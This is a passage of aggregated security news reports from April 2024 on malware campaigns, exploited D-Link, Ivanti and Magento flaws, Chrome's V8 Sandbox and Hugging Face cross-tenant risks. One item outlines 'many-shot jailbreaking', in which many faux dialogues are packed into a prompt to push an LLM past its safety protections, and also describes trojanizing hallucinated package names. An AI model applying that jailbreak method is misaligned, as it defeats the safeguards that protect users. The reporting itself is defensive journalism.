Also delivered using the plugin system is a stealer that gathers information about the system and exfiltrates data from folders associated with wallets and applications like Atomic Wallet, Electrum, Ethereum, Exodus, Jaxx Liberty (retired as of March 2023), Zcash, Foxmail, and Telegram to a remote server.
"This analysis reveals a sophisticated attack leveraging multiple layers of obfuscation and evasion techniques to distribute and execute VenomRAT via ScrubCrypt," Lin said.
"The attackers employ a variety of methods, including phishing emails with malicious attachments, obfuscated script files, and Guloader PowerShell, to infiltrate and compromise victim systems. Furthermore, deploying plugins through different payloads highlights the versatility and adaptability of the attack campaign."
Critical Flaws Leave 92,000 D-Link NAS Devices Vulnerable to Malware Attacks
9.4.24
Vulnerebility
The Hacker News
Threat actors are actively scanning
and exploiting a pair of security flaws that are said to affect as many as
92,000 internet-exposed D-Link network-attached storage (NAS) devices.
Tracked as CVE-2024-3272 (CVSS score: 9.8) and CVE-2024-3273 (CVSS score: 7.3), the vulnerabilities impact legacy D-Link products that have reached end-of-life (EoL) status. D-Link, in an advisory, said it does not plan to ship a patch and instead urges customers to replace them.
"The vulnerability lies within the nas_sharing.cgi uri, which is vulnerable due to two main issues: a backdoor facilitated by hard-coded credentials, and a command injection vulnerability via the system parameter," security researcher who goes by the name netsecfish said in late March 2024.
Successful exploitation of the flaws could lead to arbitrary command execution on the affected D-Link NAS devices, granting threat actors the ability to access sensitive information, alter system configurations, or even trigger a denial-of-service (DoS) condition.
The issues affect the following models -
DNS-320L
DNS-325
DNS-327L, and
DNS-340L
Threat intelligence firm
GreyNoise said it observed attackers attempting to weaponize the flaws to
deliver the Mirai botnet malware, thus making it possible to remotely commandeer
the D-Link devices.
In the absence of a fix, the Shadowserver Foundation is recommending that users either take these devices offline or have remote access to the appliance firewalled to mitigate potential threats.
The findings once again illustrate that Mirai botnets are continuously adapting and incorporating new vulnerabilities into their repertoire, with threat actors swiftly developing new variants that are designed to abuse these issues to breach as many devices as possible.
With network devices becoming common targets for financially motivated and nation-state-linked attackers, the development comes as Palo Alto Networks Unit 42 revealed that threat actors are increasingly switching to malware-initiated scanning attacks to flag vulnerabilities in target networks.
"Some scanning attacks originate from benign networks likely driven by malware on infected machines," the company said.
"By launching scanning attacks from compromised hosts, attackers can accomplish the following: Covering their traces, bypassing geofencing, expanding botnets, [and] leveraging the resources of these compromised devices to generate a higher volume of scanning requests compared to what they could achieve using only their own devices."
Google Chrome Adds V8 Sandbox - A New Defense Against Browser Attacks
9.4.24
Safety
The Hacker News
Google has announced support for
what's called a V8 Sandbox in the Chrome web browser in an effort to address
memory corruption issues.
The sandbox, according to V8 security technical lead Samuel Groß, aims to prevent "memory corruption in V8 from spreading within the host process."
The search behemoth has described V8 Sandbox as a lightweight, in-process sandbox for the JavaScript and WebAssembly engine that's designed to mitigate common V8 vulnerabilities.
The idea is to limit the impact of V8 vulnerabilities by restricting the code executed by V8 to a subset of the process' virtual address space ("the sandbox") and isolating it from the rest of the process.
Shortcomings affecting V8 have accounted for a significant chunk of the zero-day vulnerabilities that Google has addressed between 2021 and 2023, with as many as 16 security flaws discovered over the time period.
"The sandbox assumes that an attacker can arbitrarily and concurrently modify any memory inside the sandbox address space as this primitive can be constructed from typical V8 vulnerabilities," the Chromium team said.
"Further, it is assumed that an attacker will be able to read memory outside of the sandbox, for example, through hardware side channels. The sandbox then aims to protect the rest of the process from such an attacker. As such, any corruption of memory outside of the sandbox address space is considered a sandbox violation."
Groß emphasized the challenges with tackling V8 vulnerabilities by switching to a memory-safe language like Rust or hardware memory safety approaches, such as memory tagging, given the "subtle logic issues" that can be exploited to corrupt memory, unlike classic memory safety bugs like use-after-frees, out-of-bounds accesses, and others.
"Nearly all vulnerabilities found and exploited in V8 today have one thing in
common: the eventual memory corruption necessarily happens inside the V8 heap
because the compiler and runtime (almost) exclusively operate on V8 HeapObject
instances," Groß said.
Given that these issues cannot be protected by the same techniques used for typical memory-corruption vulnerabilities, the V8 Sandbox is designed to isolate V8's heap memory such that should any memory corruption occur, it cannot escape the security confines to other parts of the process' memory.
This is accomplished by replacing all data types that can access out-of-sandbox memory with "sandbox-compatible" alternatives, thereby effectively preventing an attacker from accessing other memory. The sandbox can be enabled by setting "v8_enable_sandbox" to true in the gn args.
Benchmark results from Speedometer and JetStream show that the security feature adds an overhead of about 1% on typical workloads, allowing it to be enabled by default starting with Chrome version 123, spanning Android, ChromeOS, Linux, macOS, and Windows.
"The V8 Sandbox requires a 64-bit system as it needs to reserve a large amount of virtual address space, currently one terabyte," Groß said.
"The sandbox is motivated by the fact that current memory safety technologies are largely inapplicable to optimizing JavaScript engines. While these technologies fail to prevent memory corruption in V8 itself, they can in fact protect the V8 Sandbox attack surface. The sandbox is therefore a necessary step towards memory safety."
The development comes as Google highlighted the role by Kernel Address Sanitizer (KASan) in detecting memory bugs in native code and help harden Android firmware security, adding it used the compiler-based tool for discovering more than 40 bugs.
"Using KASan enabled builds during testing and/or fuzzing can help catch memory corruption vulnerabilities and stability issues before they land on user devices," Eugene Rodionov and Ivan Lozano from the Android team said.
Watch Out for 'Latrodectus' - This Malware Could Be In Your Inbox
8.4.24
Virus
The Hacker News
Threat hunters have discovered a
new malware called Latrodectus that has been distributed as part of email
phishing campaigns since at least late November 2023.
"Latrodectus is an up-and-coming downloader with various sandbox evasion functionality," researchers from Proofpoint and Team Cymru said in a joint analysis published last week, adding it's designed to retrieve payloads and execute arbitrary commands.
There is evidence to suggest that the malware is likely written by the same threat actors behind the IcedID malware, with the downloader put to use by initial access brokers (IABs) to facilitate the deployment of other malware.
Latrodectus has been primarily linked to two different IABs tracked by Proofpoint under the names TA577 (aka Water Curupira) and TA578, the former of which has also been linked to the distribution of QakBot and PikaBot.
As of mid-January 2024, it's been employed almost exclusively by TA578 in email threat campaigns, in some cases delivered via a DanaBot infection.
TA578, known to be active since at least May 2020, has been linked to email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, Cobalt Strike, and Bumblebee.
Attack chains leverage contact forms on websites to send legal threats regarding alleged copyright infringement to targeted organizations. The links embedded in the messages direct the recipients to a bogus website to trick them into downloading a JavaScript file that's responsible for launching the main payload using msiexec.
"Latrodectus will post encrypted system information to the command-and-control server (C2) and request the download of the bot," the researchers said. "Once the bot registers with the C2, it sends requests for commands from the C2."
It also comes with capabilities to detect if it's running in a sandboxed
environment by checking if the host has a valid MAC address and there are at
least 75 running processes on systems running Windows 10 or newer.
Like in the case of IcedID, Latrodectus is designed to send the registration information in a POST request to the C2 server where the fields are HTTP parameters stringed together and encrypted, after which it awaits further instructions from the server.
The commands allow the malware to enumerate files and processes, execute binaries and DLL files, run arbitrary directives via cmd.exe, update the bot, and even shut down a running process.
A further examination of the attacker infrastructure reveals that the first C2 servers came alive on September 18, 2023. These servers, in turn, are configured to communicate with an upstream Tier 2 server that was set up around August 2023.
Latrodectus' connections to IcedID stems from the fact that the T2 server "maintains connections with backend infrastructure associated with IcedID" and use of jump boxes previously associated with IcedID operations.
"Latrodectus will become increasingly used by financially motivated threat actors across the criminal landscape, particularly those who previously distributed IcedID," Team Cymru assessed.
Cybercriminals Targeting Latin America with Sophisticated Phishing Scheme
8.4.24
Phishing
The Hacker News
A new phishing campaign has set its
eyes on the Latin American region to deliver malicious payloads to Windows
systems.
"The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious file download posing as an invoice," Trustwave SpiderLabs researcher Karla Agregado said.
The email message, the company said, originates from an email address format that uses the domain "temporary[.]link" and has Roundcube Webmail listed as the User-Agent string.
The HTML file points containing a link ("facturasmex[.]cloud") that displays an error message saying "this account has been suspended," but when visited from an IP address geolocated to Mexico, loads a CAPTCHA verification page that uses Cloudflare Turnstile.
This step paves the way for a redirect to another domain from where a malicious RAR file is downloaded. The RAR archive comes with a PowerShell script that gathers system metadata as well as checks for the presence of antivirus software in the compromised machine.
It also incorporates several Base64-encoded strings that are designed to run PHP scripts to determine the user's country and retrieve a ZIP file from Dropbox containing "many highly suspicious files."
Trustwave said the campaign exhibits similarities with that of Horabot malware campaigns that have targeted Spanish-speaking users in Latin America in the past.
"Understandably, from the threat actors' point of view, phishing campaigns always try different [approaches] to hide any malicious activity and avoid immediate detection," Agregado said.
"Using newly created domains and making them accessible only in specific countries is another evasion technique. especially if the domain behaves differently depending on their target country."
The development comes as Malwarebytes revealed a malvertising campaign targeting Microsoft Bing search users with bogus ads for NordVPN that lead to the distribution of a remote access trojan called SectopRAT (aka ArechClient) hosted on Dropbox via a phony website ("besthord-vpn[.]com").
"Malvertising continues to show how easy it is to surreptitiously install malware under the guise of popular software downloads," security researcher Jérôme Segura said. "Threat actors are able to roll out infrastructure quickly and easily to bypass many content filters."
It also follows the discovery of a fake Java Access Bridge installer that serves as a conduit to deploy the open-source XMRig cryptocurrency miner, per SonicWall.
The network security company said it also discovered a Golang malware that "uses multiple geographic checks and publicly available packages to screenshot the system before installing a root certificate to the Windows registry for HTTPS communications to the [command-and-control server]."
Google Sues App Developers Over Fake Crypto Investment App Scam
8.4.24
Cryptocurrency
The Hacker News
Google has filed a lawsuit against
two app developers for engaging in an "international online consumer investment
fraud scheme" that tricked users into downloading bogus Android apps from the
Google Play Store and other sources and stealing their funds under the guise of
promising higher returns.
The individuals in question are Yunfeng Sun (aka Alphonse Sun) and Hongnam Cheung (aka Zhang Hongnim or Stanford Fischer), who are believed to be based in Shenzhen and Hong Kong, respectively.
The defendants are said to have uploaded about 87 crypto apps to the Play Store to pull off the social engineering scam since at least 2019, with over 100,000 users downloading them and leading to substantial financial losses.
"The gains conveyed by the apps were illusory," the tech giant said in its complaint. "And the scheme did not end there."
"Instead, when individual victims attempted to withdraw their balances, defendants and their confederates would double down on the scheme by requesting various fees and other payments from victims that were supposedly necessary for the victims to recover their principal investments and purported gains."
While this kind of scam is typically referred to as pig butchering (aka shā zhū pán), Google said it "neither adopts nor endorses the use of this term." It's derived from the idea that victims are fattened up like hogs with the promise of lucrative returns before "slaughtering" them for their assets.
In September 2023, the U.S. Financial Crimes Enforcement Network (FinCEN) said these scams are perpetrated by criminal enterprises based in Southeast Asia that employ hundreds of thousands of people who are trafficked to the region by promising them high-paying jobs.
The fraudulent scheme entails the scammers using elaborate fictitious personas to target unsuspecting individuals via social media or dating platforms, enticing them with the prospect of a romantic relationship to build trust and convince them to invest in cryptocurrency portfolios that purport to offer high profits within a short span of time with an aim to steal their funds.
To create the appearance of legitimacy, the financially motivated actors are known to fabricate websites and mobile apps to display a bogus investment portfolio with large returns.
Sun and Cheung, said Google, lured victim investors to download their fraudulent apps through text messages using Google Voice to target victims in the U.S. and Canada. Other distribution methods include affiliate marketing campaigns that offer commissions for "signing up additional users" and YouTube videos promoting the fake investment platforms.
The company described the malicious activity as persistent and continuing, with the defendants "using varying computer network infrastructure and accounts to obfuscate their identities, and making material misrepresentations to Google in the process."
It also accused them of violating the Racketeer Influenced and Corrupt Organizations Act (RICO), carrying out wire fraud, and breaching the Google Play App Signing Terms of Service, Developer Program Policies, YouTube's Community Guidelines, as well as the Google Voice Acceptable Use Policy.
"Google Play can continue to be an app-distribution platform that users want to use only if users feel confident in the integrity of the apps," Google added. "By using Google Play to conduct their fraud scheme, defendants have threatened the integrity of Google Play and the user experience."
It's worth noting that the problem is not limited to the Android ecosystem alone, as prior reports show that such bogus apps have also repeatedly made their way to the Apple App Store.
The development is the latest in a series of legal actions that Google has taken to avoid the misuse of its products. In November 2023, the company sued multiple individuals in India and Vietnam for distributing fake versions of its Bard AI chatbot (now rebranded as Gemini) to propagate malware via Facebook.
Hackers Exploit Magento Bug to Steal Payment Data from E-commerce Websites
7.4.24
Exploit
The Hacker News
Threat actors have been found
exploiting a critical flaw in Magento to inject a persistent backdoor into
e-commerce websites.
The attack leverages CVE-2024-20720 (CVSS score: 9.1), which has been described by Adobe as a case of "improper neutralization of special elements" that could pave the way for arbitrary code execution.
It was addressed by the company as part of security updates released on February 13, 2024.
Sansec said it discovered a "cleverly crafted layout template in the database" that's being used to automatically inject malicious code to execute arbitrary commands.
"Attackers combine the Magento layout parser with the beberlei/assert package (installed by default) to execute system commands," the company said.
"Because the layout block is tied to the checkout cart, this command is executed whenever <store>/checkout/cart is requested."
The command in question is sed, which is used to insert a code execution backdoor that's then responsible for delivering a Stripe payment skimmer to capture and exfiltrate financial information to another compromised Magento store.
The development comes as the Russian government has charged six people for using skimmer malware to steal credit card and payment information from foreign e-commerce stores at least since late 2017.
The suspects are Denis Priymachenko, Alexander Aseyev, Alexander Basov, Dmitry Kolpakov, Vladislav Patyuk, and Anton Tolmachev. Recorded Future News reported that the arrests were made a year ago, citing court documents.
"As a result, members of the hacker group illegally took possession of information about almost 160 thousand payment cards of foreign citizens, after which they sold them through shadow internet sites," the Prosecutor General's Office of the Russian Federation said.
AI-as-a-Service Providers Vulnerable to PrivEsc and Cross-Tenant Attacks
7.4.24
AI
The Hacker News
New research has found that
artificial intelligence (AI)-as-a-service providers such as Hugging Face are
susceptible to two critical risks that could allow threat actors to escalate
privileges, gain cross-tenant access to other customers' models, and even take
over the continuous integration and continuous deployment (CI/CD) pipelines.
"Malicious models represent a major risk to AI systems, especially for AI-as-a-service providers because potential attackers may leverage these models to perform cross-tenant attacks," Wiz researchers Shir Tamari and Sagi Tzadik said.
"The potential impact is devastating, as attackers may be able to access the millions of private AI models and apps stored within AI-as-a-service providers."
The development comes as machine learning pipelines have emerged as a brand new supply chain attack vector, with repositories like Hugging Face becoming an attractive target for staging adversarial attacks designed to glean sensitive information and access target environments.
The threats are two-pronged, arising as a result of shared inference infrastructure takeover and shared CI/CD takeover. They make it possible to run untrusted models uploaded to the service in pickle format and take over the CI/CD pipeline to perform a supply chain attack.
The findings from the cloud security firm show that it's possible to breach the service running the custom models by uploading a rogue model and leverage container escape techniques to break out from its own tenant and compromise the entire service, effectively enabling threat actors to obtain cross-tenant access to other customers' models stored and run in Hugging Face.
"Hugging Face will still let the user infer the uploaded Pickle-based model on the platform's infrastructure, even when deemed dangerous," the researchers elaborated.
This essentially permits an attacker to craft a PyTorch (Pickle) model with arbitrary code execution capabilities upon loading and chain it with misconfigurations in the Amazon Elastic Kubernetes Service (EKS) to obtain elevated privileges and laterally move within the cluster.
"The secrets we obtained could have had a significant impact on the platform if they were in the hands of a malicious actor," the researchers said. "Secrets within shared environments may often lead to cross-tenant access and sensitive data leakage.
To mitigate the issue, it's recommended to enable IMDSv2 with Hop Limit so as to
prevent pods from accessing the Instance Metadata Service (IMDS) and obtaining
the role of a Node within the cluster.
The research also found that it's possible to achieve remote code execution via
a specially crafted Dockerfile when running an application on the Hugging Face
Spaces service, and use it to pull and push (i.e., overwrite) all the images
that are available on an internal container registry.
Hugging Face, in coordinated disclosure, said it has addressed all the
identified issues. It's also urging users to employ models only from trusted
sources, enable multi-factor authentication (MFA), and refrain from using pickle
files in production environments.
"This research demonstrates that utilizing untrusted AI models (especially
Pickle-based ones) could result in serious security consequences," the
researchers said. "Furthermore, if you intend to let users utilize untrusted AI
models in your environment, it is extremely important to ensure that they are
running in a sandboxed environment."
The disclosure follows another research from Lasso Security that it's possible
for generative AI models like OpenAI ChatGPT and Google Gemini to distribute
malicious (and non-existant) code packages to unsuspecting software developers.
In other words, the idea is to find a recommendation for an unpublished package
and publish a trojanized package in its place in order to propagate the malware.
The phenomenon of AI package hallucinations underscores the need for exercising
caution when relying on large language models (LLMs) for coding solutions.
AI company Anthropic, for its part, has also detailed a new method called
"many-shot jailbreaking" that can be used to bypass safety protections built
into LLMs to produce responses to potentially harmful queries by taking
advantage of the models' context window.
"The ability to input increasingly-large amounts of information has obvious
advantages for LLM users, but it also comes with risks: vulnerabilities to
jailbreaks that exploit the longer context window," the company said earlier
this week.
The technique, in a nutshell, involves introducing a large number of faux
dialogues between a human and an AI assistant within a single prompt for the LLM
in an attempt to "steer model behavior" and respond to queries that it wouldn't
otherwise (e.g., "How do I build a bomb?").
From PDFs to Payload: Bogus Adobe Acrobat Reader Installers Distribute Byakugan
Malware
5.4.24
Virus
The Hacker News
Bogus installers for Adobe Acrobat Reader are being used to distribute a new multi-functional malware dubbed Byakugan.
The starting point of the attack is a PDF file written in Portuguese that, when opened, shows a blurred image and asks the victim to click on a link to download the Reader application to view the content.
According to Fortinet FortiGuard Labs, clicking the URL leads to the delivery of an installer ("Reader_Install_Setup.exe") that activates the infection sequence. Details of the campaign were first disclosed by the AhnLab Security Intelligence Center (ASEC) last month.
The attack chain leverages techniques like DLL hijacking and Windows User Access Control (UAC) bypass to load a malicious dynamic-link library (DLL) file named "BluetoothDiagnosticUtil.dll," which, in turn, loads unleashes the final payload. It also deploys a legitimate installer for a PDF reader like Wondershare PDFelement.
The binary is equipped to gather and exfiltrate system metadata to a command-and-control (C2) server and drop the main module ("chrome.exe") from a different server that also acts as its C2 for receiving files and commands.
"Byakugan is a node.js-based malware packed into its executable by pkg," security researcher Pei Han Liao said. "In addition to the main script, there are several libraries corresponding to features."
This includes setting up persistence, monitoring the victim's desktop using OBS Studio, capturing screenshots, downloading cryptocurrency miners, logging keystrokes, enumerating and uploading files, and grabbing data stored in web browsers.
"There is a growing trend to use both clean and malicious components in malware, and Byakugan is no exception," Fortinet said. "This approach increases the amount of noise generated during analysis, making accurate detections more difficult."
The disclosure comes as ASEC revealed a new campaign that propagates the Rhadamanthys information stealer under the guise of an installer for groupware.
"The threat actor created a fake website to resemble the original website and exposed the site to the users using the ad feature in search engines," the South Korean cybersecurity firm said. "The malware in distribution uses the indirect syscall technique to hide from the eyes of security solutions."
It also follows a discovery that a manipulated version of Notepad++ is being employed by unidentified threat actors to propagate the WikiLoader malware (aka WailingCrab).
New Wave of JSOutProx Malware Targeting Financial Firms in APAC and MENA
5.4.24
Virus
The Hacker News
Financial organizations in the
Asia-Pacific (APAC) and Middle East and North Africa (MENA) are being targeted
by a new version of an "evolving threat" called JSOutProx.
"JSOutProx is a sophisticated attack framework utilizing both JavaScript and .NET," Resecurity said in a technical report published this week.
"It employs the .NET (de)serialization feature to interact with a core JavaScript module running on the victim's machine. Once executed, the malware enables the framework to load various plugins, which conduct additional malicious activities on the target."
First identified in December 2019 by Yoroi, early attacks distributing JSOutProx have been attributed to a threat actor tracked as Solar Spider. The operations track record of striking banks and other big companies in Asia and Europe.
In late 2021, Quick Heal Security Labs detailed attacks leveraging the remote access trojan (RAT) to single out employees of small finance banks from India. Other campaign waves have taken aim at Indian government establishments as far back as April 2020.
Attack chains are known to leverage spear-phishing emails bearing malicious JavaScript attachments masquerading as PDFs and ZIP archives containing rogue HTA files to deploy the heavily obfuscated implant.
"This malware has various plugins to perform various operations such as exfiltration of data, performing file system operations," Quick Heal noted [PDF] at the time. "Apart from that, it also has various methods with offensive capabilities that perform various operations."
The plugins allow it to harvest a wide range of information from the compromised host, control proxy settings, capture clipboard content, access Microsoft Outlook account details, and gather one-time passwords from Symantec VIP. A unique feature of the malware is its use of the Cookie header field for command-and-control (C2) communications.
JSOutProx also stands for the fact that it's a fully functional RAT implemented in JavaScript.
"JavaScript simply does not offer as much flexibility as a PE file does," Fortinet FortiGuard Labs said in a report released in December 2020, describing a campaign directed against governmental monetary and financial sectors in Asia.
"However, as JavaScript is used by many websites, it appears to most users as benign, as individuals with basic security knowledge are taught to avoid opening attachments that end in .exe. Also, because JavaScript code can be obfuscated, it easily bypasses antivirus detection, allowing it to filter through undetected."
The latest set of attacks documented by Resecurity entails using fake SWIFT or MoneyGram payment notifications to trick email recipients into executing the malicious code. The activity is said to have witnessed a spike starting February 8, 2024.
The artifacts have been observed hosted on GitHub and GitLab repositories, which have since been blocked and taken down.
"Once the malicious code has been successfully delivered, the actor removes the repository and creates a new one," the cybersecurity company said. "This tactic is likely related to the actor uses to manage multiple malicious payloads and differentiate targets."
The exact origins of the e-crime group behind the malware are presently unknown, although the victimology distribution of the attacks and the sophistication of the implant alludes to them originating from China or affiliated with it, Resecurity posited.
The development comes as cyber criminals are promoting on the dark web new software called GEOBOX that repurposes Raspberry Pi devices for conducting fraud and anonymization.
Offered for only $80 per month (or $700 for a lifetime license), the tool allows the operators to spoof GPS locations, emulate specific network and software settings, mimic settings of known Wi-Fi access points, as well as bypass anti-fraud filters.
Such tools could have serious security implications as they open the door to a broad spectrum of crimes like state-sponsored attacks, corporate espionage, dark web market operations, financial fraud, anonymous distribution of malware, and even access to geofenced content.
"The ease of access to GEOBOX raises significant concerns within the cybersecurity community about its potential for widespread adoption among various threat actors," Resecurity said.
Researchers Identify Multiple China Hacker Groups Exploiting Ivanti Security
Flaws
5.4.24
Vulnerebility
The Hacker News
Multiple China-nexus threat actors
have been linked to the zero-day exploitation of three security flaws impacting
Ivanti appliances (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893).
The clusters are being tracked by Mandiant under the monikers UNC5221, UNC5266, UNC5291, UNC5325, UNC5330, and UNC5337. Another group linked to the exploitation spree is UNC3886.
The Google Cloud subsidiary said it has also observed financially motivated actors exploiting CVE-2023-46805 and CVE-2024-21887, likely in an attempt to conduct cryptocurrency mining operations.
"UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments," Mandiant researchers said.
The threat actor has been linked to post-exploitation activity leading to the deployment of the Sliver command-and-control (C2) framework, a variant of the WARPWIRE credential stealer, and a new Go-based backdoor dubbed TERRIBLETEA that comes with command execution, keylogging, port scanning, file system interaction, and screen capturing functions.
UNC5330, which has been observed combining CVE-2024-21893 and CVE-2024-21887 to breach Ivanti Connect Secure VPN appliances at least since February 2024, has leveraged custom malware such as TONERJAM and PHANTOMNET for facilitating post-compromise actions -
PHANTOMNET - A modular backdoor that communicates using a custom communication
protocol over TCP and employs a plugin-based system to download and execute
additional payloads
TONERJAM - A launcher that's designed to decrypt and
execute PHANTOMNET
Besides using Windows Management Instrumentation (WMI) to
perform reconnaissance, move laterally, manipulate registry entries, and
establish persistence, UNC5330 is known to compromise LDAP bind accounts
configured on the infected devices in order to domain admin access.
Another notable China-linked espionage actor is UNC5337, which is said to have
infiltrated Ivanti devices as early as January 2024 using CVE-2023-46805 and
CVE-2024 to deliver a custom malware toolset known as SPAWN that comprises four
distinct components that work in tandem to function as a stealthy and persistent
backdoor -
SPAWNSNAIL - A passive backdoor that listens on localhost and is equipped to
launch an interactive bash shell as well as launch SPAWNSLOTH
SPAWNMOLE - A
tunneler utility that's capable of directing malicious traffic to a specific
host while passing benign traffic unmodified to the Connect Secure web server
SPAWNANT - An installer that's responsible for ensuring the persistence of
SPAWNMOLE and SPAWNSNAIL by taking advantage of a coreboot installer function
SPAWNSLOTH - A log tampering program that disables logging and log forwarding to
an external syslog server when the SPAWNSNAIL implant is running
Mandiant has
assessed with medium confidence that UNC5337 and UNC5221 are one and the same
threat group, noting the SPAWN tool is "designed to enable long-term access and
avoid detection."
UNC5221, which was previously attributed to web shells such as BUSHWALK, CHAINLINE, FRAMESTING, and LIGHTWIRE, has also unleashed a Perl-based web shell referred to as ROOTROT that's embedded into a legitimate Connect Secure .ttc file located at "/data/runtime/tmp/tt/setcookie.thtml.ttc" by exploiting CVE-2023-46805 and CVE-2024-21887.
A successful deployment of the web shell is followed by network reconnaissance and lateral movement, in some cases, resulting in the compromise of a vCenter server in the victim network by means of a Golang backdoor called BRICKSTORM.
"BRICKSTORM is a Go backdoor targeting VMware vCenter servers," Mandiant researchers explained. "It supports the ability to set itself up as a web server, perform file system and directory manipulation, perform file operations such as upload/download, run shell commands, and perform SOCKS relaying."
The last among the five China-based groups tied to the abuse of Ivanti security flaws is UNC5291, which Mandiant said likely has associations with another hacking group UNC3236 (aka Volt Typhoon), primarily owing to its targeting of academic, energy, defense, and health sectors.
"Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024," the company said.
The findings once again underscore the threat faced by edge appliances, with the espionage actors utilizing a combination of zero-day flaws, open-source tooling, and custom backdoors to tailor their tradecraft depending on their targets to evade detection for extended periods of time.
Vietnam-Based Hackers Steal Financial Data Across Asia with Malware
5.4.24
APT
The Hacker News
A suspected Vietnamese-origin
threat actor has been observed targeting victims in several Asian and Southeast
Asian countries with malware designed to harvest valuable data since at least
May 2023.
Cisco Talos is tracking the cluster under the name CoralRaider, describing it as financially motivated. Targets of the campaign include India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.
"This group focuses on stealing victims' credentials, financial data, and social media accounts, including business and advertisement accounts," security researchers Chetan Raghuprasad and Joey Chen said. "They use RotBot, a customized variant of Quasar RAT, and XClient stealer as payloads."
Other commodity malware used by the group comprises a combination of remote access trojans and information stealers such as AsyncRAT, NetSupport RAT, and Rhadamanthys.
The targeting of business and advertisement accounts has been of particular focus for attackers operating out of Vietnam, with various stealer malware families like Ducktail, NodeStealer, and VietCredCare deployed to take control of the accounts for further monetization.
The modus operandi entails the use of Telegram to exfiltrate the stolen information from victim machines, which is then traded in underground markets to generate illicit revenues.
"CoralRaider operators are based in Vietnam, based on the actor messages in their Telegram C2 bot channels and language preference in naming their bots, PDB strings, and other Vietnamese words hard-coded in their payload binaries," the researchers said.
Attack chains start with a Windows shortcut file (LNK), although there is currently no clear explanation as to how these files are distributed to the targets.
Should the LNK file be opened, an HTML application (HTA) file is downloaded and
executed from an attacker-controlled download server, which, in turn, runs an
embedded Visual Basic script.
The script, for its part, decrypts and sequentially executes three other PowerShell scripts that are responsible for performing anti-VM and anti-analysis checks, circumventing Windows User Access Control (UAC), disabling Windows and application notifications, and downloading and running RotBot.
RotBot is configured to contact a Telegram bot and retrieve the XClient stealer malware and execute it in memory, ultimately facilitating the theft of cookies, credentials, and financial information from web browsers like Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera; Discord and Telegram data; and screenshots.
XClient is also engineered to siphon data from victims' Facebook, Instagram, TikTok and YouTube accounts, gathering details about the payment methods and permissions associated with their Facebook business and ads accounts.
"RotBot is a variant of the Quasar RAT client that the threat actor has customized and compiled for this campaign," the researchers said. "[XClient] has extensive information-stealing capability through its plugin module and various modules for performing remote administrative tasks."
The development comes as Bitdefender disclosed details of a malvertising campaign on Facebook that's taking advantage of the buzz surrounding generative AI tools to push an assortment of information stealers like Rilide, Vidar, IceRAT, and a new entrant known as Nova Stealer.
The starting point of the attack is the threat actor taking over an existing Facebook account and modifying its appearance to mimic well-known AI tools from Google, OpenAI, and Midjourney, and expanding their reach by running sponsored ads on the platform.
One such imposter page masquerading as Midjourney had 1.2 million followers before it was taken down on March 8, 2023. The threat actors managing the page were mainly from Vietnam, the U.S., Indonesia, the U.K., and Australia, among others.
"The malvertising campaigns have tremendous reach through Meta's sponsored ad system and have actively been targeting European users from Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden, and elsewhere," the Romanian cybersecurity company said.
New Phishing Campaign Targets Oil & Gas with Evolved Data-Stealing Malware
5.4.24
Phishing
The Hacker News
An updated version of an
information-stealing malware called Rhadamanthys is being used in phishing
campaigns targeting the oil and gas sector.
"The phishing emails use a unique vehicle incident lure and, in later stages of the infection chain, spoof the Federal Bureau of Transportation in a PDF that mentions a significant fine for the incident," Cofense researcher Dylan Duncan said.
The email message comes with a malicious link that leverages an open redirect flaw to take the recipients to a link hosting a supposed PDF document, but, in reality, is an image that, upon clicking, downloads a ZIP archive with the stealer payload.
Written in C++, Rhadamanthys is designed to establish connections with a command-and-control (C2) server in order to harvest sensitive data from the compromised hosts.
"This campaign appeared within days of the law enforcement takedown of the LockBit ransomware group," Duncan said. "While this could be a coincidence, Trend Micro revealed in August 2023 a Rhadamanthys variant that came bundled with a leaked LockBit payload, alongside a clipper malware and cryptocurrency miner.
"The threat actors added a combination of an information stealer and a LockBit
ransomware variant in a single Rhadamanthys bundle, possibly indicating the
continued evolution of the malware," the company noted.
The development comes amid a steady stream of new stealer malware families like Sync-Scheduler and Mighty Stealer, even as existing strains like StrelaStealer are evolving with improved obfuscation and anti-analysis techniques.
It also follows the emergence of a malspam campaign targeting Indonesia that
employs banking-related lures to propagate the Agent Tesla malware to plunder
sensitive information such as login credentials, financial data, and personal
documents.
Agent Tesla phishing campaigns observed in November 2023 have also set their sights on Australia and the U.S., according to Check Point, which attributed the operations to two African-origin threat actors tracked as Bignosa (aka Nosakhare Godson and Andrei Ivan) and Gods (aka GODINHO or Kmarshal or Kingsley Fredrick), the latter of whom works as a web designer.
"The main actor [Bignosa] appears to be a part of a group operating malware and phishing campaigns, targeting organizations, which is testified by the US and Australian email business databases, as well as individuals," the Israeli cybersecurity company said.
The Agent Tesla malware distributed via these attack chains have been found to be secured by the Cassandra Protector, which helps protect software programs against reverse-engineering or modification efforts. The messages are sent via an open-source webmail tool called RoundCube.
"As seen from the description of these threat actors' actions, no rocket science degree is required to conduct the cyber crime operations behind one of the most prevalent malware families in the last several years," Check Point said.
"It's an unfortunate course of events caused by the low-entry level threshold so that anyone willing to provoke victims to launch the malware via spam campaigns can do so."
New HTTP/2 Vulnerability Exposes Web Servers to DoS Attacks
4.4.24
Hacking
The Hacker News
New research has found that the
CONTINUATION frame in the HTTP/2 protocol can be exploited to conduct
denial-of-service (DoS) attacks.
The technique has been codenamed HTTP/2 CONTINUATION Flood by security researcher Bartek Nowotarski, who reported the issue to the CERT Coordination Center (CERT/CC) on January 25, 2024.
"Many HTTP/2 implementations do not properly limit or sanitize the amount of CONTINUATION frames sent within a single stream," CERT/CC said in an advisory on April 3, 2024.
"An attacker that can send packets to a target server can send a stream of CONTINUATION frames that will not be appended to the header list in memory but will still be processed and decoded by the server or will be appended to the header list, causing an out of memory (OOM) crash."
